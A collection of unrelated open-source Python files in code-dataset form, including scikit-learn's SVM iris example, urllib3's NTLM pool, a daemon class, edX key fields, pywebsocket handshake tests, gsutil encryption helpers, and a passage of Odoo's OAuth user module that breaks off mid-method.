for u in M.User.objects.filter(salt=None):
if usercount >0 and usercount%100 == 0:
print "updated a chunk of 100 users..."
usercount+=1
if u.password != None and u.saltedhash == None:
u.set_password(u.password)
# we will unset the password manually later
# u.password = None
u.save()
print "update done: success"
if __name__ == "__main__" :
ACTIONS = {
"immediate": do_immediate,
"digest": do_digest,
"watchdog": do_watchdog,
"extract": do_extract,
"dumpensemble": do_dumpensemble,
"upgrade": do_upgrade
}
utils.process_cli(__file__, ACTIONS)
| mit |
dhruv13J/scikit-learn | examples/svm/plot_iris.py | 62 | 3251 | """
==================================================
Plot different SVM classifiers in the iris dataset
==================================================
Comparison of different linear SVM classifiers on a 2D projection of the iris
dataset. We only consider the first 2 features of this dataset:
- Sepal length
- Sepal width
This example shows how to plot the decision surface for four SVM classifiers
with different kernels.
The linear models ``LinearSVC()`` and ``SVC(kernel='linear')`` yield slightly
different decision boundaries. This can be a consequence of the following
differences:
- ``LinearSVC`` minimizes the squared hinge loss while ``SVC`` minimizes the
regular hinge loss.
- ``LinearSVC`` uses the One-vs-All (also known as One-vs-Rest) multiclass
reduction while ``SVC`` uses the One-vs-One multiclass reduction.
Both linear models have linear decision boundaries (intersecting hyperplanes)
while the non-linear kernel models (polynomial or Gaussian RBF) have more
flexible non-linear decision boundaries with shapes that depend on the kind of
kernel and its parameters.
.. NOTE:: while plotting the decision function of classifiers for toy 2D
datasets can help get an intuitive understanding of their respective
expressive power, be aware that those intuitions don't always generalize to
more realistic high-dimensional problem.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
# import some data to play with
iris = datasets.load_iris()
X = iris.data[:, :2] # we only take the first two features. We could
# avoid this ugly slicing by using a two-dim dataset
y = iris.target
h = .02 # step size in the mesh
# we create an instance of SVM and fit out data. We do not scale our
# data since we want to plot the support vectors
C = 1.0 # SVM regularization parameter
svc = svm.SVC(kernel='linear', C=C).fit(X, y)
rbf_svc = svm.SVC(kernel='rbf', gamma=0.7, C=C).fit(X, y)
poly_svc = svm.SVC(kernel='poly', degree=3, C=C).fit(X, y)
lin_svc = svm.LinearSVC(C=C).fit(X, y)
# create a mesh to plot in
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
# title for the plots
titles = ['SVC with linear kernel',
'LinearSVC (linear kernel)',
'SVC with RBF kernel',
'SVC with polynomial (degree 3) kernel']
for i, clf in enumerate((svc, lin_svc, rbf_svc, poly_svc)):
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
plt.subplot(2, 2, i + 1)
plt.subplots_adjust(wspace=0.4, hspace=0.4)
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
# Plot also the training points
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Paired)
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.xticks(())
plt.yticks(())
plt.title(titles[i])
plt.show()
| bsd-3-clause |
JoaoVasques/aws-devtool | eb/macosx/python3/lib/aws/requests/packages/urllib3/contrib/ntlmpool.py | 262 | 4740 | # urllib3/contrib/ntlmpool.py
# Copyright 2008-2012 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
NTLM authenticating pool, contributed by erikcederstran
Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10
"""
try:
from http.client import HTTPSConnection
except ImportError:
from httplib import HTTPSConnection
from logging import getLogger
from ntlm import ntlm
from urllib3 import HTTPSConnectionPool
log = getLogger(__name__)
class NTLMConnectionPool(HTTPSConnectionPool):
"""
Implements an NTLM authentication version of an urllib3 connection pool
"""
scheme = 'https'
def __init__(self, user, pw, authurl, *args, **kwargs):
"""
authurl is a random URL on the server that is protected by NTLM.
user is the Windows user, probably in the DOMAIN\username format.
pw is the password for the user.
"""
super(NTLMConnectionPool, self).__init__(*args, **kwargs)
self.authurl = authurl
self.rawuser = user
user_parts = user.split('\\', 1)
self.domain = user_parts[0].upper()
self.user = user_parts[1]
self.pw = pw
def _new_conn(self):
# Performs the NTLM handshake that secures the connection. The socket
# must be kept open while requests are performed.
self.num_connections += 1
log.debug('Starting NTLM HTTPS connection no. %d: https://%s%s' %
(self.num_connections, self.host, self.authurl))
headers = {}
headers['Connection'] = 'Keep-Alive'
req_header = 'Authorization'
resp_header = 'www-authenticate'
conn = HTTPSConnection(host=self.host, port=self.port)
# Send negotiation message
headers[req_header] = (
'NTLM %s' % ntlm.create_NTLM_NEGOTIATE_MESSAGE(self.rawuser))
log.debug('Request headers: %s' % headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
reshdr = dict(res.getheaders())
log.debug('Response status: %s %s' % (res.status, res.reason))
log.debug('Response headers: %s' % reshdr)
log.debug('Response data: %s [...]' % res.read(100))
# Remove the reference to the socket, so that it can not be closed by
# the response object (we want to keep the socket open)
res.fp = None
# Server should respond with a challenge message
auth_header_values = reshdr[resp_header].split(', ')
auth_header_value = None
for s in auth_header_values:
if s[:5] == 'NTLM ':
auth_header_value = s[5:]
if auth_header_value is None:
raise Exception('Unexpected %s response header: %s' %
(resp_header, reshdr[resp_header]))
# Send authentication message
ServerChallenge, NegotiateFlags = \
ntlm.parse_NTLM_CHALLENGE_MESSAGE(auth_header_value)
auth_msg = ntlm.create_NTLM_AUTHENTICATE_MESSAGE(ServerChallenge,
self.user,
self.domain,
self.pw,
NegotiateFlags)
headers[req_header] = 'NTLM %s' % auth_msg
log.debug('Request headers: %s' % headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
log.debug('Response status: %s %s' % (res.status, res.reason))
log.debug('Response headers: %s' % dict(res.getheaders()))
log.debug('Response data: %s [...]' % res.read()[:100])
if res.status != 200:
if res.status == 401:
raise Exception('Server rejected request: wrong '
'username or password')
raise Exception('Wrong server response: %s %s' %
(res.status, res.reason))
res.fp = None
log.debug('Connection established')
return conn
def urlopen(self, method, url, body=None, headers=None, retries=3,
redirect=True, assert_same_host=True):
if headers is None:
headers = {}
headers['Connection'] = 'Keep-Alive'
return super(NTLMConnectionPool, self).urlopen(method, url, body,
headers, retries,
redirect,
assert_same_host)
| apache-2.0 |
clearcode/Apache2Piwik | src/daemons.py | 1 | 2900 | #-*- coding: utf-8 -*-
#!/usr/bin/env python
import sys, os, time, atexit
from signal import SIGTERM
from datetime import datetime
class Daemon:
"""
A generic daemon class.
Usage: subclass the Daemon class and override the run() method
"""
def __init__(self, pidfile, stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = pidfile
def daemonize(self):
"""
do the UNIX double-fork magic, see Stevens' "Advanced
Programming in the UNIX Environment" for details (ISBN 0201563177)
http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
"""
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = file(self.stdin, 'r')
so = file(self.stdout, 'a+')
se = file(self.stderr, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
#os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# write pidfile
atexit.register(self.delpid)
pid = str(os.getpid())
f = open(self.pidfile,'w+')
f.write("%s\n" % pid)
def delpid(self):
os.remove(self.pidfile)
def start(self,d):
"""
Start the daemon
"""
# Check for a pidfile to see if the daemon already runs
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if pid:
message = "pidfile %s already exist. Daemon already running?\n"
sys.stderr.write(message % self.pidfile)
sys.exit(1)
# Start the daemon
self.daemonize()
self.run(d)
def stop(self):
"""
Stop the daemon
"""
# Get the pid from the pidfile
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if not pid:
message = "pidfile %s does not exist. Daemon not running?\n"
sys.stderr.write(message % self.pidfile)
return # not an error in a restart
# Try killing the daemon process
try:
while 1:
os.kill(pid, SIGTERM)
time.sleep(0.1)
except OSError, err:
err = str(err)
if err.find("No such process") > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print str(err)
sys.exit(1)
def run(self,d):
"""
You should override this method when you subclass Daemon. It will be called after the process has been
daemonized by start() or restart().
"""
| gpl-3.0 |
waheedahmed/edx-platform | common/lib/xmodule/xmodule/modulestore/mongoengine_fields.py | 209 | 3190 | """
Custom field types for mongoengine
"""
import mongoengine
from opaque_keys.edx.locations import SlashSeparatedCourseKey, Location
from types import NoneType
from opaque_keys.edx.keys import CourseKey, UsageKey
class CourseKeyField(mongoengine.StringField):
"""
Serializes and deserializes CourseKey's to mongo dbs which use mongoengine
"""
def __init__(self, **kwargs):
# it'd be useful to add init args such as support_deprecated, force_deprecated
super(CourseKeyField, self).__init__(**kwargs)
def to_mongo(self, course_key):
"""
For now saves the course key in the deprecated form
"""
assert isinstance(course_key, (NoneType, CourseKey))
if course_key:
# don't call super as base.BaseField.to_mongo calls to_python() for some odd reason
return course_key.to_deprecated_string()
else:
return None
def to_python(self, course_key):
"""
Deserialize to a CourseKey instance
"""
# calling super b/c it decodes utf (and doesn't have circularity of from_python)
course_key = super(CourseKeyField, self).to_python(course_key)
assert isinstance(course_key, (NoneType, basestring, CourseKey))
if course_key == '':
return None
if isinstance(course_key, basestring):
return SlashSeparatedCourseKey.from_deprecated_string(course_key)
else:
return course_key
def validate(self, value):
assert isinstance(value, (NoneType, basestring, CourseKey))
if isinstance(value, CourseKey):
return super(CourseKeyField, self).validate(value.to_deprecated_string())
else:
return super(CourseKeyField, self).validate(value)
def prepare_query_value(self, _opt, value):
return self.to_mongo(value)
class UsageKeyField(mongoengine.StringField):
"""
Represent a UsageKey as a single string in Mongo
"""
def to_mongo(self, location):
"""
For now saves the usage key in the deprecated location i4x/c4x form
"""
assert isinstance(location, (NoneType, UsageKey))
if location is None:
return None
return super(UsageKeyField, self).to_mongo(location.to_deprecated_string())
def to_python(self, location):
"""
Deserialize to a UsageKey instance: for now it's a location missing the run
"""
assert isinstance(location, (NoneType, basestring, UsageKey))
if location == '':
return None
if isinstance(location, basestring):
location = super(UsageKeyField, self).to_python(location)
return Location.from_deprecated_string(location)
else:
return location
def validate(self, value):
assert isinstance(value, (NoneType, basestring, UsageKey))
if isinstance(value, UsageKey):
return super(UsageKeyField, self).validate(value.to_deprecated_string())
else:
return super(UsageKeyField, self).validate(value)
def prepare_query_value(self, _opt, value):
return self.to_mongo(value)
| agpl-3.0 |
xin3liang/platform_external_chromium-trace | trace-viewer/third_party/pywebsocket/src/test/test_handshake_hybi00.py | 30 | 15038 | #!/usr/bin/env python
#
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for handshake.hybi00 module."""
import unittest
import set_sys_path # Update sys.path to locate mod_pywebsocket module.
from mod_pywebsocket.handshake._base import HandshakeException
from mod_pywebsocket.handshake import hybi00 as handshake
from test import mock
_GOOD_REQUEST = (
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U')
_GOOD_REQUEST_CAPITALIZED_HEADER_VALUES = (
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'UPGRADE',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WEBSOCKET',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U')
_GOOD_RESPONSE_DEFAULT_PORT = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: ws://example.com/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'\r\n'
'8jKS\'y:G*Co,Wxa-')
_GOOD_RESPONSE_SECURE = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: wss://example.com/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'\r\n'
'8jKS\'y:G*Co,Wxa-')
_GOOD_REQUEST_NONDEFAULT_PORT = (
8081,
'GET',
'/demo',
{
'Host': 'example.com:8081',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U')
_GOOD_RESPONSE_NONDEFAULT_PORT = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: ws://example.com:8081/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'\r\n'
'8jKS\'y:G*Co,Wxa-')
_GOOD_RESPONSE_SECURE_NONDEF = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: wss://example.com:8081/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'\r\n'
'8jKS\'y:G*Co,Wxa-')
_GOOD_REQUEST_NO_PROTOCOL = (
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U')
_GOOD_RESPONSE_NO_PROTOCOL = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: ws://example.com/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'\r\n'
'8jKS\'y:G*Co,Wxa-')
_GOOD_REQUEST_WITH_OPTIONAL_HEADERS = (
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'EmptyValue': '',
'Sec-WebSocket-Protocol': 'sample',
'AKey': 'AValue',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U')
# TODO(tyoshino): Include \r \n in key3, challenge response.
_GOOD_REQUEST_WITH_NONPRINTABLE_KEY = (
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': 'y R2 48 Q1O4 e|BV3 i5 1 u- 65',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '36 7 74 i 92 2\'m 9 0G',
'Origin': 'http://example.com',
},
''.join(map(chr, [0x01, 0xd1, 0xdd, 0x3b, 0xd1, 0x56, 0x63, 0xff])))
_GOOD_RESPONSE_WITH_NONPRINTABLE_KEY = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: ws://example.com/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'\r\n' +
''.join(map(chr, [0x0b, 0x99, 0xfa, 0x55, 0xbd, 0x01, 0x23, 0x7b,
0x45, 0xa2, 0xf1, 0xd0, 0x87, 0x8a, 0xee, 0xeb])))
_BAD_REQUESTS = (
( # HTTP request
80,
'GET',
'/demo',
{
'Host': 'www.google.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;'
' en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3'
' GTB6 GTBA',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,'
'*/*;q=0.8',
'Accept-Language': 'en-us,en;q=0.5',
'Accept-Encoding': 'gzip,deflate',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive': '300',
'Connection': 'keep-alive',
}),
( # Wrong method
80,
'POST',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Missing Upgrade
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Wrong Upgrade
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'NonWebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Empty WebSocket-Protocol
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': '',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Wrong port number format
80,
'GET',
'/demo',
{
'Host': 'example.com:0x50',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Header/connection port mismatch
8080,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Illegal WebSocket-Protocol
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'illegal\x09protocol',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
)
def _create_request(request_def):
data = ''
if len(request_def) > 4:
data = request_def[4]
conn = mock.MockConn(data)
conn.local_addr = ('0.0.0.0', request_def[0])
return mock.MockRequest(
method=request_def[1],
uri=request_def[2],
headers_in=request_def[3],
connection=conn)
def _create_get_memorized_lines(lines):
"""Creates a function that returns the given string."""
def get_memorized_lines():
return lines
return get_memorized_lines
def _create_requests_with_lines(request_lines_set):
requests = []
for lines in request_lines_set:
request = _create_request(_GOOD_REQUEST)
request.connection.get_memorized_lines = _create_get_memorized_lines(
lines)
requests.append(request)
return requests
class Hybi00HandshakerTest(unittest.TestCase):
def test_good_request_default_port(self):
request = _create_request(_GOOD_REQUEST)
handshaker = handshake.Handshaker(request,
mock.MockDispatcher())
handshaker.do_handshake()
self.assertEqual(_GOOD_RESPONSE_DEFAULT_PORT,
request.connection.written_data())
self.assertEqual('/demo', request.ws_resource)
self.assertEqual('http://example.com', request.ws_origin)
self.assertEqual('ws://example.com/demo', request.ws_location)
self.assertEqual('sample', request.ws_protocol)
def test_good_request_capitalized_header_values(self):
request = _create_request(_GOOD_REQUEST_CAPITALIZED_HEADER_VALUES)
handshaker = handshake.Handshaker(request,
mock.MockDispatcher())
handshaker.do_handshake()
self.assertEqual(_GOOD_RESPONSE_DEFAULT_PORT,
request.connection.written_data())
def test_good_request_secure_default_port(self):
request = _create_request(_GOOD_REQUEST)
request.connection.local_addr = ('0.0.0.0', 443)
request.is_https_ = True
handshaker = handshake.Handshaker(request,
mock.MockDispatcher())
handshaker.do_handshake()
self.assertEqual(_GOOD_RESPONSE_SECURE,
request.connection.written_data())
self.assertEqual('sample', request.ws_protocol)
def test_good_request_nondefault_port(self):
request = _create_request(_GOOD_REQUEST_NONDEFAULT_PORT)
handshaker = handshake.Handshaker(request,
mock.MockDispatcher())
handshaker.do_handshake()
self.assertEqual(_GOOD_RESPONSE_NONDEFAULT_PORT,
request.connection.written_data())
self.assertEqual('sample', request.ws_protocol)
def test_good_request_secure_non_default_port(self):
request = _create_request(_GOOD_REQUEST_NONDEFAULT_PORT)
request.is_https_ = True
handshaker = handshake.Handshaker(request,
mock.MockDispatcher())
handshaker.do_handshake()
self.assertEqual(_GOOD_RESPONSE_SECURE_NONDEF,
request.connection.written_data())
self.assertEqual('sample', request.ws_protocol)
def test_good_request_default_no_protocol(self):
request = _create_request(_GOOD_REQUEST_NO_PROTOCOL)
handshaker = handshake.Handshaker(request,
mock.MockDispatcher())
handshaker.do_handshake()
self.assertEqual(_GOOD_RESPONSE_NO_PROTOCOL,
request.connection.written_data())
self.assertEqual(None, request.ws_protocol)
def test_good_request_optional_headers(self):
request = _create_request(_GOOD_REQUEST_WITH_OPTIONAL_HEADERS)
handshaker = handshake.Handshaker(request,
mock.MockDispatcher())
handshaker.do_handshake()
self.assertEqual('AValue',
request.headers_in['AKey'])
self.assertEqual('',
request.headers_in['EmptyValue'])
def test_good_request_with_nonprintable_key(self):
request = _create_request(_GOOD_REQUEST_WITH_NONPRINTABLE_KEY)
handshaker = handshake.Handshaker(request,
mock.MockDispatcher())
handshaker.do_handshake()
self.assertEqual(_GOOD_RESPONSE_WITH_NONPRINTABLE_KEY,
request.connection.written_data())
self.assertEqual('sample', request.ws_protocol)
def test_bad_requests(self):
for request in map(_create_request, _BAD_REQUESTS):
handshaker = handshake.Handshaker(request,
mock.MockDispatcher())
self.assertRaises(HandshakeException, handshaker.do_handshake)
if __name__ == '__main__':
unittest.main()
# vi:sts=4 sw=4 et
| bsd-3-clause |
BrandonY/gsutil | gslib/encryption_helper.py | 10 | 3614 | # -*- coding: utf-8 -*-
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper functions for customer-supplied encryption functionality."""
import base64
import binascii
from hashlib import sha256
import boto
from gslib.cloud_api import CryptoTuple
from gslib.exception import CommandException
_MAX_DECRYPTION_KEYS = 100
def CryptoTupleFromKey(crypto_key):
"""Returns a CryptoTuple matching the crypto key, or None for no key."""
return CryptoTuple(crypto_key) if crypto_key else None
def FindMatchingCryptoKey(key_sha256):
"""Searches .boto config for an encryption key matching the SHA256 hash.
Args:
key_sha256: Base64-encoded string SHA256 hash of the AES256 encryption key.
Returns:
Base64-encoded encryption key string if a match is found, None otherwise.
"""
encryption_key = boto.config.get('GSUtil', 'encryption_key', None)
if encryption_key is not None:
if key_sha256 == Base64Sha256FromBase64EncryptionKey(encryption_key):
return encryption_key
for i in range(_MAX_DECRYPTION_KEYS):
key_number = i + 1
decryption_key = boto.config.get(
'GSUtil', 'decryption_key%s' % str(key_number), None)
if decryption_key is None:
# Reading 100 config values can take ~1ms in testing. To avoid adding
# this tax, stop reading keys as soon as we encounter a non-existent
# entry (in lexicographic order).
break
elif key_sha256 == Base64Sha256FromBase64EncryptionKey(decryption_key):
return decryption_key
def GetEncryptionTuple():
"""Returns the encryption tuple from .boto configuration."""
encryption_key = _GetBase64EncryptionKey()
return CryptoTuple(encryption_key) if encryption_key else None
def GetEncryptionTupleAndSha256Hash():
"""Returns encryption tuple and SHA256 key hash from .boto configuration."""
encryption_key_sha256 = None
encryption_tuple = GetEncryptionTuple()
if encryption_tuple:
encryption_key_sha256 = Base64Sha256FromBase64EncryptionKey(
encryption_tuple.crypto_key)
return (encryption_tuple, encryption_key_sha256)
def Base64Sha256FromBase64EncryptionKey(encryption_key):
return base64.encodestring(binascii.unhexlify(
_CalculateSha256FromString(
base64.decodestring(encryption_key)))).replace('\n', '')
def _CalculateSha256FromString(input_string):
sha256_hash = sha256()
sha256_hash.update(input_string)
return sha256_hash.hexdigest()
def _GetBase64EncryptionKey():
"""Reads the encryption key from .boto configuration.
Returns:
Base64-encoded encryption key string, or None if no encryption key exists
in configuration.
"""
encryption_key = boto.config.get('GSUtil', 'encryption_key', None)
if encryption_key:
# Ensure the key has a valid encoding.
try:
base64.decodestring(encryption_key)
except:
raise CommandException(
'Configured encryption_key is not a valid base64 string. Please '
'double-check your configuration and ensure the key is valid and in '
'base64 format.')
return encryption_key
| apache-2.0 |
gsmartway/odoo | addons/auth_oauth/res_users.py | 157 | 4897 | import logging
import werkzeug.urls
import urlparse
import urllib2
import simplejson
import openerp
from openerp.addons.auth_signup.res_users import SignupError
from openerp.osv import osv, fields
from openerp import SUPERUSER_ID
_logger = logging.getLogger(__name__)
class res_users(osv.Model):
_inherit = 'res.users'
_columns = {
'oauth_provider_id': fields.many2one('auth.oauth.provider', 'OAuth Provider'),
'oauth_uid': fields.char('OAuth User ID', help="Oauth Provider user_id", copy=False),
'oauth_access_token': fields.char('OAuth Access Token', readonly=True, copy=False),
}
_sql_constraints = [
('uniq_users_oauth_provider_oauth_uid', 'unique(oauth_provider_id, oauth_uid)', 'OAuth UID must be unique per provider'),
]
def _auth_oauth_rpc(self, cr, uid, endpoint, access_token, context=None):
params = werkzeug.url_encode({'access_token': access_token})
if urlparse.urlparse(endpoint)[4]:
url = endpoint + '&' + params
else:
url = endpoint + '?' + params
f = urllib2.urlopen(url)
response = f.read()
return simplejson.loads(response)
def _auth_oauth_validate(self, cr, uid, provider, access_token, context=None):
""" return the validation data corresponding to the access token """
p = self.pool.get('auth.oauth.provider').browse(cr, uid, provider, context=context)
validation = self._auth_oauth_rpc(cr, uid, p.validation_endpoint, access_token)
if validation.get("error"):
raise Exception(validation['error'])
if p.data_endpoint:
data = self._auth_oauth_rpc(cr, uid, p.data_endpoint, access_token)
validation.update(data)
return validation
def _auth_oauth_signin(self, cr, uid, provider, validation, params, context=None):
""" retrieve and sign in the user corresponding to provider and validated access token
:param provider: oauth provider id (int)
:param validation: result of validation of access token (dict)
:param params: oauth parameters (dict)
:return: user login (str)
:raise: openerp.exceptions.AccessDenied if signin failed
This method can be overridden to add alternative signin methods.
"""
try:
oauth_uid = validation['user_id']
user_ids = self.search(cr, uid, [("oauth_uid", "=", oauth_uid), ('oauth_provider_id', '=', provider)])
if not user_ids:
raise openerp.exceptions.AccessDenied()
